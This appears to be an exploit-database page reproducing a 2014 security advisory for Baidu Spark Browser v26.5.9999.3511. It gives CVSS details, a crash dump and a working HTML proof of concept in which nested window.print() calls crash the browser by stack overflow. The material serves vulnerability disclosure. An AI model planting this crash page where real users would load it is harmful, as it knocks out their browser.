Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow (DoS)

2014-07-02 / 2014-08-25
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-119

CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

<!-- Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow Vulnerability (DoS) Vendor: Baidu, Inc. Product web page: Affected version: 26.5.9999.3511 Summary: Spark Browser is a free Internet browser with very sharp UIs and cool utilities. It's based on the Chromium technology platform, giving it fast browsing capabilities. Desc: Spark Browser version 26.5.9999.3511 allows remote attackers to cause a denial of service (application crash) resulting in stack overflow via nested calls to the window.print javascript function. ----------------------------------------------------------------- (153c.14f4): Stack overflow - code c00000fd (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=000000b0 ebx=003d0000 ecx=003d0000 edx=5000016b esi=00000000 edi=0000010c eip=77e0decf esp=03d23000 ebp=03d230c4 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202 ntdll!memcpy+0xbb8f: 77e0decf 56 push esi ----------------------------------------------------------------- Tested on: Microsoft Windows 7 Professional SP1 (EN) Microsoft Windows 7 Ultimate SP1 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5190 Advisory URL: 28.06.2014 --> <html> <title>Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</title> <body bgcolor="#50708C"> <center> <p><font color="#e3e3e3">Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</font></p> <button onClick=crash()>Execute!</button> </center> <script> function crash(){ window.print(); crash(); } </script> </body> </html>


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top